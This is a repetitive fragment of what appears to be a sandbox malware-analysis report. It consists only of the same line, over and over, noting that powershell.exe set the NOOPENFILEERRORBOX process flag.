                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
